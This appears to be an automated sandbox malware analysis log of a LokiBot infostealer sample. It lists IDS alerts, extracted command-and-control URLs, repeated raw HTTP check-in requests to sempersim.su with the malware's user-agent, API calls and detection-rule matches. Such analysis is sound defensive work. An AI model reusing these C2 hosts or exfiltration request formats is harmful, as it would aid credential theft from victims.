                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61497 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49800
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57890 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49801
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:55142 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49802
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64948 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49808
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60418 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49809
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64259 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49810
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61068 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49812
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:58715 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49813
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57816 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49814
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:51787 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49815
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:53916 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49816
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60790 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49818
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:62708 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49819
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60946 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49820
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: RACKTECHRU RACKTECHRU
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: dhGoVvfmul.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: dehbibhar.exe, 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gf3/fre.php
                Source: dehbibhar.exe, dehbibhar.exe, 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dehbibhar.exe, 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: sempersim.su
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00404ED4 recv,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary

                barindex
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
